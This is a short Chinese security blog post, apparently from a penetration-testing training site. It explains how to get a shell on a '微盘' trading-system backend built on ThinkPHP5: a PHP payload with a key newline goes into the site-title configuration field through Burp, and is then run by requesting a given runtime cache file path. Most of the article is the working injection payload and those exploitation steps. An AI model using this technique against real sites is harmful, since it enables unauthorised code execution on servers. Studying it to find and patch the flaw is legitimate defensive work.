【微盘系统】后台修改配置文件通过缓存进行Getshell

07310

先阅读文章:Thinkphp5.X缓存文件命名规则解析  或许才能看得懂下面内容。

修改网站标题:

Image description

通过Burp进行中间修改

Image description

phpinfo();/*
Image description

有换行,这个换行比较重要。没有他就GG。

然后去访问刷新前台。

Image description

看到标题改变后访问:

Image description

Getshell成功!

案例2

参数设置->配置管理->web_name->修改

Image description

Payload:

web_name"
phpinfo();/*

最终访问:

/runtime/cache/29/1918da8988fc177007497b63de9cc8.php

Image description
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
Web安全任意代码执行
喜欢就支持一下吧
点赞10 分享
root的头像-赤道学院
权限维持之隐藏计划任务多版本实战演示-赤道学院
权限维持之隐藏计划任务多版本实战演示
权限维持之隐藏计划任务多版本实战演示
4个月前 786
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
5个月前 144
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
SSRF漏洞之Gopher协议发起GET与POST请求
4个月前 126
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
SQL注入+文件下载实现任意文件读取
5个月前 96
记某次荐股类型诈骗获取境外诈骗人员电脑权限-赤道学院
记某次荐股类型诈骗获取境外诈骗人员电脑权限
记某次荐股类型诈骗获取境外诈骗人员电脑权限
5个月前 96
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
Windows 管理员账户空密码如何实现登陆?
4个月前 89
相关推荐
评论 抢沙发

请登录后发表评论

    暂无评论内容

用户封面
root的头像-赤道学院
PowerShell修改lnk属性实现BypassUac
Ubuntu 开启证书登录与密钥登录双模式运行
权限维持之隐藏计划任务多版本实战演示
内网渗透之用户登录启动进程的多种方法总结
Windows 管理员账户空密码如何实现登陆?
【第二十课】PHP+HTML 套模板做一个企业官网
热门文章
权限维持之隐藏计划任务多版本实战演示-赤道学院
786人已阅读
权限维持之隐藏计划任务多版本实战演示
TOP1
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
5个月前144人已阅读
TOP2
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
4个月前126人已阅读
TOP3
记某次荐股类型诈骗获取境外诈骗人员电脑权限-赤道学院
记某次荐股类型诈骗获取境外诈骗人员电脑权限
5个月前96人已阅读
TOP4
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
5个月前96人已阅读
TOP5
【第一课】了解系统的类型与Vmware基础操作使用介绍-赤道学院
【第一课】了解系统的类型与Vmware基础操作使用介绍
5个月前89人已阅读
TOP6
标签云
电信诈骗 (1)文件读取 (1)文件下载 (1)文件上传 (1)反向代理 (1)劫持数据 (1)冒充公检法 (1)任意文件上传 (1)代码执行 (1)上传拦截 (1)tomcat (1)thinkphp5.0.13 (1)SQL注入 (1)nginx (1)getshell (1)CDN (1)
最新评论